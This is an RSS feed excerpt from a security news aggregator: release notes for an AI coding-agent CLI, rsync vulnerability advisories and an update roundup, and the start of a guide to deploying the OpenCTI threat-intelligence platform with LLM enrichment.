<li>Fixed pressing Esc (or Alt+Up dequeue) while agent-authored messages were queued — advisor concern/blocker notes, hidden goal/plan/budget steers, IRC/extension asides — dumping their text into the user's editor. Editor restoration (<code>clearQueue()</code>), pending chips (<code>getQueuedMessages()</code>), and <code>popLastQueuedMessage()</code> now surface only genuinely user-authored queued messages (plain user turns and <code>attribution: "user"</code> custom messages like <code>/skill</code>). Plain Alt+Up dequeue leaves all other queued messages in place for the continuing stream; only the Esc interrupt path keeps just advisor cards (so abort's preservation still re-records them as visible advice) and drops other internal steers, so a user interrupt can't be silently undone by an auto-resume on leftover internal context. <code>queuedMessageCount</code> still reflects all actual queued work (advisor cards included) so <code>hasPendingMessages()</code>/RPC and the empty-submit abort gate stay accurate.</li>
<li>Fixed advisor <code>concern</code>/<code>blocker</code> advice being withheld from the running agent and then dumped as one burst at the next user prompt after a deliberate interrupt. A user interrupt latches advisor auto-resume suppression, but a non-user resume (synthetic/auto-continue, or a queued steer draining after the abort) leaves the run streaming with that latch still set, so every interrupting note was parked hidden in the next-turn queue instead of steered into the live turn — the agent never heard the advisor mid-run and the backlog flushed all at once on the next prompt. Suppression now only withholds interrupting advice while the agent is idle (or still tearing the interrupted turn down); once a turn is streaming again the note is steered in live, since steering an active run never auto-resumes a stopped one. A concern that strands in the steer queue past the resumed turn's final poll is reclaimed as visible advice when the agent settles (mirroring abort), so it neither auto-resumes the stopped run nor lingers to flush at the next prompt.</li>
<li>Fixed <code>omp --continue</code>/<code>-c</code> sometimes resuming into a subagent transcript instead of the interactive session. Subagent (and HTML-export) <code>SessionManager.open()</code> calls run in the parent's terminal and were clobbering the per-TTY <code>--continue</code> breadcrumb with their own artifact-dir session file; these headless opens now suppress the breadcrumb. <code>continueRecent()</code> also recovers already-poisoned breadcrumbs by resolving any session file inside a parent's artifacts dir (<code>&lt;parent&gt;/&lt;agentId&gt;.jsonl</code>) back up to the top-level session.</li>
<li>Fixed the Agent Hub stacking duplicate <code>Agent Hub · N running</code> frames and stranding garbage rows in scrollback while navigating with subagents still streaming. The hub was a non-fullscreen overlay composited over a live transcript, so each time a running subagent's progress grew the frame and scrolled the window the previously-painted hub copy was pushed permanently into the terminal's native scrollback (which the engine can't rewrite). It now renders inline in the editor slot — the same anchored region every other selector and the <code>ask</code> tool use — riding the normal append-only commit path, so the transcript commits above it exactly once and the hub repaints in place instead of leaking copies. (Avoids borrowing the alternate screen.)</li>
<li>Fixed every subagent registering itself as its own parent in the agent registry (<code>parentId === id</code>), so the Agent Hub rendered each agent as <code>sub · of &lt;itself&gt;</code> and the ←← parent-navigation gesture looped on the same agent. The SDK was reusing <code>parentTaskPrefix</code> — the agent's own artifact/output-id prefix — as the registry parent link; spawns now pass a separate <code>parentAgentId</code> (the spawning agent's id: <code>Main</code> for top-level <code>task</code> spawns, the parent subagent for nested spawns and eval <code>agent()</code>, the focused agent for <code>/tan</code>) and the registry records that as the parent.</li>
<li>Fixed messaging a <code>parked</code> subagent that was restored from disk (Agent Hub scan, or a resumed/restarted session) failing with <code>cannot be revived (no reviver registered)</code> even though its transcript was intact. Such refs carry a session file but no in-memory reviver — the executor's live reviver closure dies with the spawning turn/process — so IRC sends and Agent Hub focus refused them. <code>AgentLifecycleManager.ensureLive</code> now cold-revives them through a persisted-subagent reviver factory (installed by the top-level interactive/RPC session) that rebuilds the subagent from its JSONL the way <code>--resume</code> rebuilds a session: it reopens the file and replays it through <code>createAgentSession</code>, but sources the runtime contract from a now-readable <code>session_init</code> record (<code>SessionManager.peekSessionInit</code>) so tools, system prompt, output schema, and kind are restored rather than resurrected as a default top-level session. <code>session_init</code> now also persists the effective <code>spawns</code> allowlist and read-summarization flag so a cold revive keeps the original capability surface (old files without them deny re-spawning rather than defaulting to wildcard). Isolated runs and pre-<code>session_init</code> files whose recorded workspace no longer exists stay transcript-only (<code>history://</code>).</li>
<li>Fixed the terminal window-title OSC writes (<code>setTerminalTitle</code>/<code>pushTerminalTitle</code>/<code>popTerminalTitle</code>) leaking escape sequences to a developer's terminal during <code>bun test</code>; they now skip when the terminal is headless (the test-runtime default), matching the <code>ProcessTerminal</code> render/probe suppression so interactive-mode tests no longer paint to the real terminal</li>
<li>Fixed empty CLI sessions being retained after opening <code>omp</code> and exiting without a prompt (<a href="https://github.com/can1357/oh-my-pi/issues/2800" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2800/hovercard">#2800</a>).</li>
<li>Fixed <code>hooks/pre/*.ts</code> and <code>hooks/post/*.ts</code> files discovered through <code>hookCapability</code> being registered in discovery but never loaded into the extension runner, so their <code>tool_call</code> handlers now run without a manual <code>settings.json</code> <code>extensions</code> entry (<a href="https://github.com/can1357/oh-my-pi/issues/2796" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2796/hovercard">#2796</a>).</li>
<li>Fixed startup model fallback choosing the plain OpenAI <code>gpt-5.5</code> provider before the Codex OAuth provider when both shared the same default model id, which could surface a misleading OpenAI 401 despite valid Codex credentials (<a href="https://github.com/can1357/oh-my-pi/issues/2807" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2807/hovercard">#2807</a>).</li>
<li>Fixed local auto-thinking classification for reasoning-capable tiny models by giving them the same safe answer budget as online reasoning classifiers, with a larger local floor for non-reasoning tiny models (<a href="https://github.com/can1357/oh-my-pi/issues/2808" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2808/hovercard">#2808</a>).</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the built-in <code>render_mermaid</code> tool and its <code>renderMermaid.enabled</code> setting, so it can no longer be invoked directly</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Removed</h3>
<ul>
<li>Removed rendering support for the <code>render_mermaid</code> tool from the web tool registry</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added <code>\tfrac</code> support to stacked display-math rendering so it now displays as a vertical fraction in <code>latexToBlock</code> output</li>
<li>Added markdown parsing for own-line display-math blocks (<code>$$...$$</code> and <code>\[...\]</code>) and delimiter-free <code>\begin{...}...\end{...}</code> math environments so block equations render via LaTeX-to-Unicode</li>
<li>Added stacked rendering of display-math fractions (<code>\frac</code>, <code>\dfrac</code>, <code>\cfrac</code>): the numerator is drawn over a horizontal bar over the denominator, with surrounding terms and <code>align</code>/<code>equation</code>-style environment rows aligned to the bar. Triggered for own-line <code>$$</code>/<code>\[</code> blocks, bare <code>\begin{...}</code> environments, and a paragraph whose sole content is a single display-math span; inline <code>$...$</code> fractions stay single-line (<code>½</code>, <code>(a+b)/c</code>)</li>
<li>Added bare math auto-rendering in <code>renderMathInText</code> for math-shaped lines and math environment blocks that omit <code>$</code>/<code>\(</code> delimiters</li>
<li>Added LaTeX-to-Unicode rendering for markdown math spans, converting <code>$$...$$</code>, <code>$...$</code>, <code>\(...\)</code>, and <code>\[...\]</code> into readable Unicode in Markdown output</li>
<li>Exported LaTeX conversion helpers from the package entrypoint so consumers can call <code>latexToUnicode</code>, <code>latexToBlock</code>, <code>renderMathInText</code>, <code>inlineMathSpanEnd</code>, and <code>isBareMathEnvironment</code> directly</li>
<li>Expanded LaTeX-to-Unicode conversion coverage for additional math fonts, delimiters, extensible arrows, layout environments, cancel/brace annotations, references, and AMS symbols</li>
<li>Added ANSI color rendering for LaTeX <code>\textcolor</code>, scoped <code>\color</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>, including xcolor/CSS color parsing and truecolor/256-color terminal output</li>
<li>Added an optional <code>maxWidth</code> parameter to <code>MarkdownTheme.resolveMermaidAscii</code> to allow diagram resolvers to fit ASCII output to the available content width</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed markdown math rendering to preserve multiline layout for display equations, keeping <code>\\</code> row breaks as separate output lines (including inside list items)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>alignat</code>/<code>alignedat</code>/<code>gatheredat</code> rendering in <code>latexToBlock</code> so the required <code>{n}</code> preamble is not rendered as visible math content</li>
<li>Fixed math parsing to leave non-math LaTeX snippets (for example <code>\begin{itemize}</code>) and fenced code blocks as literal text instead of rendering them as math</li>
<li>Fixed <code>renderInlineMarkdown</code> to handle top-level display-math tokens so raw <code>$$...$$</code> delimiters are no longer leaked</li>
<li>Fixed inline math span detection so escaped dollars and currency-like patterns (such as <code>$5</code> and <code>$10</code>) are not converted as math</li>
<li>Fixed Mermaid diagram rendering in Markdown code blocks to clip each ASCII line to content width before wrapping, preventing preformatted diagram rows from fragmenting</li>
<li>Fixed fullscreen overlays losing keyboard focus to hidden prompt surfaces, which could make settings unresponsive while a background approval request was pending (<a href="https://github.com/can1357/oh-my-pi/issues/2789" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2789/hovercard">#2789</a>).</li>
<li>Fixed <code>bun test</code> runs inside a real terminal leaking TUI output: <code>ProcessTerminal</code> now honors a headless test-runtime default, so frame paints, <code>start()</code> capability probes (OSC 11 / DA1 / kitty), the progress keepalive, notifications, and teardown escapes no longer reach the developer's terminal, and stdin raw mode is never engaged. Previously <code>#safeWrite</code> only skipped on <code>!process.stdout.isTTY</code>, so a developer running the suite in an interactive terminal saw stray status/editor boxes and probe queries. Terminal-contract suites opt back into real I/O via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>escapeXmlText</code> utility to escape XML-significant characters <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> in element body text</li>
<li>Added <code>isTerminalHeadless()</code> / <code>setTerminalHeadless()</code> to centrally suppress real-terminal side effects (stdout escape/frame writes, stdin raw mode, CSI/OSC capability probes, SIGWINCH, window-title changes, emergency restore) under the test runtime. Defaults on when <code>bun test</code> sets <code>NODE_ENV=test</code>; terminal-contract tests opt out via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): keep overlay focus above hidden prompts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676940403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2795" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2795/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2795">#2795</a></li>
<li>fix(coding-agent): load discovered hook factories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677385980" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2798" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2798/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2798">#2798</a></li>
<li>fix(cli): skip empty session persistence by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677808827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2804" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2804/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2804">#2804</a></li>
<li>fix(coding-agent): prefer Codex default auth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678553738" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2810">#2810</a></li>
<li>fix(coding-agent): expand local auto-thinking classifier budget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678723092" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2814" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2814/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2814">#2814</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.0.2...v16.0.3"><tt>v16.0.2...v16.0.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rsync (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3603060/it-security-nachrichten/mehrere-probleme-in-rsync-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603060/it-security-nachrichten/mehrere-probleme-in-rsync-ubuntu/</guid>
<pubDate>Tue, 16 Jun 2026 22:08:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Zwei Probleme in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3603047/it-security-nachrichten/zwei-probleme-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603047/it-security-nachrichten/zwei-probleme-in-rsync-red-hat/</guid>
<pubDate>Tue, 16 Jun 2026 22:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (mod_http2, postfix, and webkit2gtk3), Debian (bird2, libgd-perl, and libreoffice), Fedora (7zip, ack, hugo, and perl-Mojo-JWT), Mageia (atril, evince, xreader, emacs, lcms2, libgcrypt, libinput, libsndfile, putty, and sudo), Red Hat (openssl and osb...]]></description>
<link>https://tsecurity.de/de/3601923/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601923/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 16 Jun 2026 15:11:11 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (mod_http2, postfix, and webkit2gtk3), <b>Debian</b> (bird2, libgd-perl, and libreoffice), <b>Fedora</b> (7zip, ack, hugo, and perl-Mojo-JWT), <b>Mageia</b> (atril, evince, xreader, emacs, lcms2, libgcrypt, libinput, libsndfile, putty, and sudo), <b>Red Hat</b> (openssl and osbuild-composer), <b>SUSE</b> (cheat, chromedriver, containerized-data-importer, cyrus-imapd, freeipmi, graphicsmagick, java-11-openj9, java-17-openj9, kitty, kubevirt, kubevirt-1.6, libcaca, libopenssl-3-devel, librav1e0_8, neonmodem, opensc, openssh, openssl-1_0_0, openssl-1_1, openssl-3, perl-HTTP-Daemon, perl-XML-LibXML, python-python-dotenv, python311-paramiko, python311-PyJWT, python311-starlette, python311-tornado6, qemu, restic, and trivy), and <b>Ubuntu</b> (adsys, cups, fastnetmon, freerdp2, freerdp3, mesa, nginx, rsync, ruby2.3, ruby2.5, and tmux).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8349-3: rsync regression]]></title>
<description><![CDATA[USN-8349-1 fixed vulnerabilities in rsync. Unfortunately that update introduced multiple
regressions in rsync functionality. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Calum Hutton discovered that rsync contained a heap-based out-of-bounds
 r...]]></description>
<link>https://tsecurity.de/de/3601314/unix-server/usn-8349-3-rsync-regression/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601314/unix-server/usn-8349-3-rsync-regression/</guid>
<pubDate>Tue, 16 Jun 2026 11:50:20 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[USN-8349-1 fixed vulnerabilities in rsync. Unfortunately that update introduced multiple
regressions in rsync functionality. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Calum Hutton discovered that rsync contained a heap-based out-of-bounds
 read when handling file transfers. A remote attacker with read access
 to an rsync server could possibly use this issue to cause a denial of
 service. (CVE-2025-10158)

 Batuhan Sancak, Damien Neil, and Michael Stapelberg discovered that
 rsync daemons configured without chroot protection were exposed to a
 race condition on parent path components. A local attacker with write
 access to a module could possibly use this issue to overwrite files,
 obtain sensitive information, or escalate privileges.
 (CVE-2026-29518)

 It was discovered that rsync did not properly validate a length value
 while sorting extended attributes. An attacker could possibly use this
 issue to cause a denial of service. (CVE-2026-41035)

 It was discovered that rsync performed reverse-DNS lookups after
 chrooting in some daemon configurations. A remote attacker could
 possibly use this issue to bypass hostname-based access controls and
 access network services. (CVE-2026-43617)

 Omar Elsayed discovered that rsync did not properly check for integer
 overflows while decoding compressed tokens. A remote attacker could
 possibly use this issue to obtain sensitive information.
 (CVE-2026-43618)

 Andrew Tridgell discovered that rsync did not fully fix a symlink race
 condition in path-based system calls for daemons configured without
 chroot protection. A local attacker could possibly use this issue to
 overwrite files, obtain sensitive information, or escalate privileges.
 (CVE-2026-43619)

 Pratham Gupta discovered that rsync did not properly validate an index
 while processing file lists. A remote attacker could possibly use this
 issue to cause rsync to crash, resulting in a denial of service.
 (CVE-2026-43620)

 Michal Ruprich discovered that rsync contained an off-by-one error
 while handling HTTP proxy responses. An attacker able to intercept network
 communications or a malicious proxy server could possibly use this issue to
 cause a denial of service. (CVE-2026-45232)]]></content:encoded>
</item>
<item>
<title><![CDATA[The Intelligent Shield. OpenCTI]]></title>
<description><![CDATA[Beyond Ingestion Subtitle: Deploying AI-Driven Enrichment in OpenCTITransforming Threat Data into High-Confidence IntelligenceIn an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the c...]]></description>
<link>https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600900/hacking/the-intelligent-shield-opencti/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:15 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Beyond Ingestion <strong>Subtitle:</strong> Deploying AI-Driven Enrichment in OpenCTI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yZJrYF0KW4x5gzDg6xNN6A.png"></figure><h3>Transforming Threat Data into High-Confidence Intelligence</h3><p>In an era of relentless and complex cyber attacks, traditional, manual threat intelligence cannot keep pace. Security teams are overwhelmed by data fragmentation and the critical lack of context. “The Intelligent Shield” introduces a new paradigm: beyond simply ingesting data, it’s about deploying advanced, automated machine learning pipelines for <strong>AI-driven enrichment.</strong></p><p>This guide demonstrates how to integrate state-of-the-art Large Language Models (LLMs), such as <strong>Claude AI</strong>, into an <strong>OpenCTI</strong> ecosystem. By leveraging the <strong>OpenCTI STIX 2.1 Knowledge Graph</strong> and natural language processing, this architecture converts disparate, unstructured data feeds into high-fidelity, actionable intelligence. It automatically builds context, executes deep mapping to frameworks like the <strong>MITRE ATT&amp;CK Matrix</strong>, and generates calculated, real-time <strong>Confidence Scores</strong>, enabling organizations to proactively strengthen their defenses with an intuitive, automated <strong>Intelligent Shield.</strong></p><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#6e45"><strong>What is OpenCTI?</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#8ff6"><strong>Core Capabilities</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7dc1"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7865"><strong>Threat Intelligence Feeds</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fe8e"><strong>AI Integration Layer</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#c6df"><strong>Prerequisites</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7c94"><strong>Docker Compose Deployment</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#b276"><strong>Connector Configuration</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#a2bd"><strong>AI-Driven Enrichment Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#99be"><strong>Post-Deployment Hardening</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#fd26"><strong>Operational Runbook</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#aabb"><strong>Troubleshooting</strong></a></li><li><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394#7e3e"><strong>Usage Examples</strong></a></li></ol><h3>1. What is OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fSYjMAN2q5yyUccU6F6daQ.png"></figure><p><strong>OpenCTI</strong> (Open Cyber Threat Intelligence) is an open-source platform developed by Filigran (formerly a project of ANSSI, the French national cybersecurity agency) for structuring, storing, organizing, visualizing, and sharing cyber threat intelligence (CTI).</p><p>It implements the <strong>STIX 2.1</strong> (Structured Threat Information eXpression) standard as its native data model and exposes a <strong>GraphQL API</strong> for all read/write operations. Every object — threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns — is stored as a STIX Domain Object (SDO) or STIX Relationship Object (SRO) backed by two databases:</p><ul><li><strong>ElasticSearch / OpenSearch</strong> — full-text search and analytics</li><li><strong>Apache Cassandra (via JanusGraph)</strong> — graph relationship storage</li></ul><h3>Why OpenCTI?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1a3jOT66dfRuy3XvkQJ5NQ.png"></figure><h3>2. Core Capabilities</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uj2dA3oWyo03XyrbjkNrGg.png"></figure><h4>2.1 Knowledge Graph</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YvoudJ_c2ItEwEgTZ8TGaQ.png"></figure><ul><li>Entities: Threat Actors, Intrusion Sets, Campaigns, Malware, Tools, Vulnerabilities (CVE), Attack Patterns (MITRE ATT&amp;CK), Courses of Action, Sectors, Countries, Organizations</li><li>Relationships modelled as first-class STIX SROs with confidence scores, date ranges, and TLP markings</li><li>Diamond Model and Kill Chain views built in</li></ul><h4>2.2 Indicator Management</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pGfNRDKffBczwNJeMydW8w.png"></figure><ul><li>IOC lifecycle: valid_from / valid_until with automatic expiry</li><li>Detection rule generation (Sigma, YARA, Snort)</li><li>Bulk import via STIX, CSV, OpenIOC, MISP formats</li><li>Scoring and confidence weighting per source</li></ul><h4>2.3 MITRE ATT&amp;CK Navigator Integration</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_jOEvP3job4uFFPBnXLIkA.png"></figure><ul><li>Full ATT&amp;CK Enterprise / Mobile / ICS matrices</li><li>Heatmaps of technique usage per threat actor or campaign</li><li>Gap analysis against your current detection coverage</li></ul><h4>2.4 Threat Actor Profiling</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*N98FeMPaxF2ZYnhLF8kEGQ.png"></figure><ul><li>Attributed aliases, motivations (financial, espionage, hacktivism)</li><li>Geo and sector targeting mapped on world map</li><li>Timeline of campaigns and malware usage</li></ul><h4>2.5 Automation &amp; Playbooks</h4><ul><li>Built-in playbook engine (since v5.9): trigger enrichment, notifications, or SOAR actions on entity creation/modification(<strong>Enterprise Edition only)</strong></li><li>Python SDK for custom automation</li><li>Webhook support for external integrations</li></ul><h4>2.6 Collaboration &amp; Sharing</h4><ul><li>Role-based access control (RBAC) with groups and organizations</li><li>TLP (Traffic Light Protocol) enforcement at object level</li><li>TAXII 2.1 server — push feeds to SIEMs, firewalls, EDR platforms</li><li>Sharing with partner organizations via federated instances</li></ul><h4>2.7 Dashboard &amp; Reporting</h4><ul><li>Customizable dashboards with widget library</li><li>PDF report generation</li><li>Timeline, matrix, and entity views</li><li>Attack path visualization</li></ul><h3>3. Architecture Overview</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAFxmmcNnaHdD8ZDbXIbDw.png"></figure><h3>4. Threat Intelligence Feeds</h3><h4>4.1 Free / Open-Source Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zamxLo7VEhjGX0cOnZvRJQ.png"></figure><ul><li><a href="https://attack.mitre.org/?utm_source=chatgpt.com"><strong>MITRE ATT&amp;CK</strong></a> — Connector: opencti/connector-mitre — Data: Techniques, mitigations, groups, software — Setup: API key not needed.</li><li><a href="https://nvd.nist.gov/?utm_source=chatgpt.com"><strong>CVE / NVD</strong></a> — Connector: opencti/connector-cve — Data: Vulnerabilities — Setup: <a href="https://nvd.nist.gov/developers/request-an-api-key">NVD API key</a> recommended/required depending on configuration.</li><li><a href="https://otx.alienvault.com/?utm_source=chatgpt.com"><strong>AlienVault OTX</strong></a> — Connector: opencti/connector-alienvault — Data: IOCs, pulses, malware families — Setup: Free OTX account/API key.</li><li><a href="https://bazaar.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch MalwareBazaar</strong></a> — Connector: opencti/connector-malwarebazaar — Data: Malware hashes, malware metadata, file observables — Setup: Free MalwareBazaar API key.</li><li><a href="https://urlhaus.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch URLhaus</strong></a> — Connector: opencti/connector-urlhaus — Data: Malicious URLs — Setup: Public feed; no API key for CSV feed.</li><li><a href="https://feodotracker.abuse.ch/?utm_source=chatgpt.com"><strong>Abuse.ch Feodo Tracker</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> or ingest the Feodo CSV/blocklist feed manually — Data: Botnet C2 IPs — Setup: Free.</li><li><a href="https://internetdb.shodan.io/"><strong>Shodan InternetDB</strong></a> — Connector: opencti/connector-shodan-internetdb — Data: IP enrichment, domains, CPEs, CVEs, tags — Setup: No API key required.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>MISP Default / CIRCL OSINT Feeds</strong></a> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> — Data: STIX/MISP bundles, indicators, observables — Setup: Free.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>CyberCrime-Tracker feed via MISP default feeds</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> rather than a dedicated current connector — Data: C2 panels / freetext indicators — Setup: Free.</li><li><a href="https://openphish.com/?utm_source=chatgpt.com"><strong>OpenPhish</strong></a> — Connector: no verified current dedicated OpenCTI connector in the main repo; use generic feed ingestion where suitable — Data: Phishing URLs — Setup: Free/community feed options.</li><li><strong>DigitalSide IT-ISAC MISP Feed</strong> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> with custom MISP_FEED_URL — Data: IOCs / MISP-format feed — Setup: Free.</li></ul><h4>4.2 Commercial Feeds (require license/API key)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dMgCc4cuy0X9LxEAcR0PiQ.png"></figure><ul><li><a href="https://www.misp-project.org/"><strong>MISP — self-hosted</strong></a> — Connector: opencti/connector-misp — Strengths: community sharing, custom events, internal/private CTI exchange. The OpenCTI repo lists both misp and misp-feed; use misp for a live MISP instance with API access, and misp-feed for static MISP feed URLs.</li><li><a href="https://www.virustotal.com/"><strong>VirusTotal / Google Threat Intelligence</strong></a> — Connector: opencti/connector-virustotal — Strengths: file, URL, domain, and IP enrichment. The connector is under internal-enrichment, not external-import.</li><li><strong>Mandiant Threat Intelligence / Google Threat Intelligence</strong> — Connector: opencti/connector-mandiant — Strengths: APT intelligence, actor reporting, malware/campaign context.</li><li><a href="https://www.recordedfuture.com/"><strong>Recorded Future</strong></a> — Connectors: opencti/connector-recordedfuture and opencti/connector-recordedfuture-enrichment — Strengths: risk lists, enrichment, vulnerability/contextual intelligence, dark web and external threat data. Recorded Future documentation describes the OpenCTI integration as two components: an enrichment connector and a Recorded Future connector.</li><li><a href="https://www.crowdstrike.com/products/threat-intelligence/"><strong>CrowdStrike Falcon Intelligence</strong></a> — Connector: opencti/connector-crowdstrike — Strengths: actor tracking, indicators, adversary intelligence, Falcon ecosystem context.</li><li><a href="https://www.sekoia.io/"><strong>Sekoia.io Intelligence</strong></a> — Connector: opencti/connector-sekoia — Strengths: European threat landscape, CTI feed ingestion, actor/campaign context. Sekoia’s own documentation points to the OpenCTI GitHub connector path.</li><li><a href="https://threatconnect.com/"><strong>ThreatConnect</strong></a> — Connector: <strong>no verified current dedicated connector in the main OpenCTI connector tree</strong> — Strengths: enterprise TI management, source aggregation, workflow and case management. I found an OpenCTI GitHub label/feature reference 